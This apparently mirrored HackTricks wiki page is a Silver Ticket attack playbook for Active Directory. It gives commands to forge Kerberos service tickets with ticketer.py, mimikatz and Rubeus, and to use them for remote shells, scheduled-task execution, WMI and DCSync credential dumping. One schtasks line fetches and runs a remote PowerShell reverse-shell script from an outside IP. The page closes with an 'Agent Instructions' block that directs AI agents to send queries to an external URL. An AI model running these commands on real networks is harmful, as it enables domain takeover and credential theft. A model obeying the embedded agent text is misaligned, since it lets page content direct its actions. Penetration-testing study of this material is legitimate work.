# Silver Ticket {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! * **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! {% embed url="" %} ## Silver ticket The **Silver Ticket** attack involves the exploitation of service tickets in Active Directory (AD) environments. This method relies on **acquiring the NTLM hash of a service account**, such as a computer account, to forge a Ticket Granting Service (TGS) ticket. With this forged ticket, an attacker can access specific services on the network, **impersonating any user**, typically aiming for administrative privileges. It's emphasized that using AES keys for forging tickets is more secure and less detectable. For ticket crafting, different tools are employed based on the operating system: ### On Linux ```bash python ticketer.py -nthash -domain-sid -domain -spn export KRB5CCNAME=/root/impacket-examples/.ccache python psexec.py /@ -k -no-pass ``` ### On Windows ```bash # Create the ticket mimikatz.exe "kerberos::golden /domain: /sid: /rc4: /user: /service: /target:" # Inject the ticket mimikatz.exe "kerberos::ptt " .\Rubeus.exe ptt /ticket: # Obtain a shell .\PsExec.exe -accepteula \\ cmd ``` The CIFS service is highlighted as a common target for accessing the victim's file system, but other services like HOST and RPCSS can also be exploited for tasks and WMI queries. ## Available Services | Service Type | Service Silver Tickets | | ------------------------------------------ | -------------------------------------------------------------------------- | | WMI |

HOST

RPCSS

| | PowerShell Remoting |

HOST

HTTP

Depending on OS also:

WSMAN

RPCSS

| | WinRM |

HOST

HTTP

In some occasions you can just ask for: WINRM

| | Scheduled Tasks | HOST | | Windows File Share, also psexec | CIFS | | LDAP operations, included DCSync | LDAP | | Windows Remote Server Administration Tools |

RPCSS

LDAP

CIFS

| | Golden Tickets | krbtgt | Using **Rubeus** you may **ask for all** these tickets using the parameter: * `/altservice:host,RPCSS,http,wsman,cifs,ldap,krbtgt,winrm` ### Silver tickets Event IDs * 4624: Account Logon * 4634: Account Logoff * 4672: Admin Logon ## Abusing Service tickets In the following examples lets imagine that the ticket is retrieved impersonating the administrator account. ### CIFS With this ticket you will be able to access the `C$` and `ADMIN$` folder via **SMB** (if they are exposed) and copy files to a part of the remote filesystem just doing something like: ```bash dir \\vulnerable.computer\C$ dir \\vulnerable.computer\ADMIN$ copy afile.txt \\vulnerable.computer\C$\Windows\Temp ``` You will also be able to obtain a shell inside the host or execute arbitrary commands using **psexec**: {% content-ref url="../lateral-movement/psexec-and-winexec" %} [psexec-and-winexec](https://angelica.gitbook.io/hacktricks/windows-hardening/lateral-movement/psexec-and-winexec) {% endcontent-ref %} ### HOST With this permission you can generate scheduled tasks in remote computers and execute arbitrary commands: ```bash #Check you have permissions to use schtasks over a remote server schtasks /S some.vuln.pc #Create scheduled task, first for exe execution, second for powershell reverse shell download schtasks /create /S some.vuln.pc /SC weekly /RU "NT Authority\System" /TN "SomeTaskName" /TR "C:\path\to\executable.exe" schtasks /create /S some.vuln.pc /SC Weekly /RU "NT Authority\SYSTEM" /TN "SomeTaskName" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1''')'" #Check it was successfully created schtasks /query /S some.vuln.pc #Run created schtask now schtasks /Run /S mcorp-dc.moneycorp.local /TN "SomeTaskName" ``` ### HOST + RPCSS With these tickets you can **execute WMI in the victim system**: ```bash #Check you have enough privileges Invoke-WmiMethod -class win32_operatingsystem -ComputerName remote.computer.local #Execute code Invoke-WmiMethod win32_process -ComputerName $Computer -name create -argumentlist "$RunCommand" #You can also use wmic wmic remote.computer.local list full /format:list ``` Find **more information about wmiexec** in the following page: {% content-ref url="../lateral-movement/wmiexec" %} [wmiexec](https://angelica.gitbook.io/hacktricks/windows-hardening/lateral-movement/wmiexec) {% endcontent-ref %} ### HOST + WSMAN (WINRM) With winrm access over a computer you can **access it** and even get a PowerShell: ```bash New-PSSession -Name PSC -ComputerName the.computer.name; Enter-PSSession PSC ``` Check the following page to learn **more ways to connect with a remote host using winrm**: {% content-ref url="../lateral-movement/winrm" %} [winrm](https://angelica.gitbook.io/hacktricks/windows-hardening/lateral-movement/winrm) {% endcontent-ref %} {% hint style="warning" %} Note that **winrm must be active and listening** on the remote computer to access it. {% endhint %} ### LDAP With this privilege you can dump the DC database using **DCSync**: ``` mimikatz(commandline) # lsadump::dcsync /dc:pcdc.domain.local /domain:domain.local /user:krbtgt ``` **Learn more about DCSync** in the following page: ## References * * {% content-ref url="dcsync" %} [dcsync](https://angelica.gitbook.io/hacktricks/windows-hardening/active-directory-methodology/dcsync) {% endcontent-ref %}
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! {% embed url="" %} {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! * **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://angelica.gitbook.io/hacktricks/windows-hardening/active-directory-methodology/silver-ticket.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.